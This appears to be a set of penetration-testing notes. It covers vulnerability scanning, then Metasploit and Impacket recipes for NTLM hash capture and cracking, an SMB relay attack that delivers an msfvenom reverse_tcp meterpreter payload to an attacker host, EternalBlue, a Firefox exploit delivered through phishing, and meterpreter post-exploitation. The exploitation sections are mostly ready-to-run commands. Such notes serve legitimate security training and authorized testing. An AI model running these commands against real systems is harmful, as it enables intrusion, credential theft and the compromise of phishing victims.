Exploitation/Vulnerability Assessment

Vulnerability Assessment

Generating a list of vulnerabilities present on all in-scope systems discovered.

Vulnerability Scanners
Only used when stealth is not a concern.

Utilize a database of known vulnerabilities to probe target daemons on TCP/UDP ports, configuration files, software suites, network devices and windows registry entries.

Vulnerability Scanners are very prone to false positives....it's good to check manually as well.

Scanners:

  1. OpenVAS
  2. Nexpose
  3. Nessus
  4. Nuclei

Nessus:
Server hosted on port 8834

Low Hanging Fruits

EyeWitness

Grabs screenshots of web applications, networking devices, and any devices using HTTP/HTTPS. It can also determine if default credentials are used.

https://github.com/FortyNorthSecurity/EyeWitness

python3 EyeWitness.py --headless --prepend-https -f <IPs/URLFile>

--active-scan will attempt to login with default creds. Very loud. Will set off IDS.

Authentication Brute Forcing

Exploitation

LM/NTLMv1

  1. Client sends an authentication request
  2. Sever sends an 8-byte random challenge
  3. Client encrypts challenge using the password hash and sends it back to the server

use auxiliary/server/capture/smb
set JOHPWFILE hashpwd
run

After setting up metasploit, we need to trick the users into starting a connection to our fake server.

If the LMHASH and NMHASH are the same, then only NT is being used. If they are different, LM is in use.

Crack the hashes w/John
john --format=ntlm <file>

NTLMv2

Only way to accks it is by brute-forcing the HMAC key.

Hash is bound to a particular server/username so they aren't reusable.

Hash can still be utilized in other attacks.

SMB Relay Attack

Reusing authentication attempts to gain access to a network system.

https://www.blackhat.com/docs/us-15/materials/us-15-Brossard-SMBv2-Sharing-More-Than-Just-Your-Files-wp.pdf

smb_relay in metasploit
Only works if the authenticating user has administrative privileges on a target

msfconsole
use exploit/windows/smb/smb_relay
set SHARE ADMIN$
set SMBHOST <SMBServer>
set LHOST <AttackerIP>
set LPORT <Port>

smbrelayx.py (part of Impacket)

Impacket: https://www.secureauth.com/labs/open-source-tools/impacket/

/usr/share/doc/python3-impacket/examples/

  1. Create meterpreter payload for Impacket to execute on target

    1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=<AttackerIP> LPORT=<PORT> -f <exe> -o <file.exe>

  2. Start listener within msfconsole

    1. use exploit/multi/handler
    2. set LHOST <AttackerIP>
    3. set LPORT <Port>
    4. run

  3. Start smbrelayx.py with the payload

    1. python3 smbrelayx.py -h <TargetIP> -e <MsfvenomPayload>

  4. If the attack succeeds, you will gain a meterpreter session.

EternalBlue (MS17_010)

CVE-2017-0144

Affects Microsoft SMBv1 implementation

Module to check for vulnerability:
auxiliary/scanner/smb/smb_ms17_010

Module to run exploit:
exploit/windows/smb/ms17_010_eternalblue

Client-Side Exploitation with Metasploit

This module starts a webserver and hosts a webpage containing the exploit.

use exploit/multi/browser/firefox_pdfjs_privilege_escalation
set SRVHOST <AttackerIP>
set SRVPORT <Port>
set PAYLOAD <firefox/shell_reverse_tcp>
run

We now need to lure the victim to the webpage via phishing or social engineering.

Metasploit

search type:exploit platform:windows
search cve:#

info <exploit>

File Path to Modules in Kali:
/usr/share/metasploit-framework/modules/../..

On my computer:
/opt/metasploit-framework/embedded/framework/modules

List Targets a payload effects:
show targets

From a meterpreter session, execute a hidden command prompt to interact with:
execute -f cmd.exe -i H
OR
shell

Meterpreter Post Exploitation Scripts:
run post/../../

run post/windows/gather/enum_services OR ps
run post/windows/gather/enum_applications
migrate <ProcessID>